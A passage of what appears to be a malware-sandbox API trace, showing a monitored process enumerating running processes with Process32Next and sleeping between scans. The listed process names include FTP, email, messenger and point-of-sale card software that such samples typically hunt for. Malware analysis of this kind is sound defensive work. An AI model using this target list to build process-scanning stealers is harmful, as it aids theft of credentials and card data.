lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0225.001] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0225.002] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0225.004] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0225.005] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0225.006] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0225.008] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0225.009] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0225.010] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0225.012] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0225.013] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0225.015] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0225.016] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0225.017] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0225.019] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0225.020] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0225.021] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0225.022] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0225.024] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0225.025] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0225.136] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0225.137] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0225.139] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0225.141] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0225.142] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0225.144] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0225.145] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0225.147] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0225.149] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0225.150] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0225.152] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0225.153] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0225.155] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0225.157] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0225.158] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0225.160] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0225.161] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0225.163] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0225.165] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0225.166] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0225.199] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0225.201] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0225.203] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0225.205] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0225.207] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0225.209] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0225.211] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0225.218] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0225.220] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0225.222] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0225.224] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0225.226] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0225.228] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0225.230] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0225.235] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0225.237] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0225.239] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0225.241] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0225.243] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0225.294] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0225.295] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0225.297] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0225.298] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0225.300] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0225.301] CloseHandle (hObject=0xdc4) returned 1 [0225.301] Sleep (dwMilliseconds=0x64) [0225.421] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0225.430] Process32First (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.431] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0225.436] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0225.437] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0225.439] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0225.440] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0225.441] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0225.443] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0225.444] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0225.445] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.447] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.451] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0225.452] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.453] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.455] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.456] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.457] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.459] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.460] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.461] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, 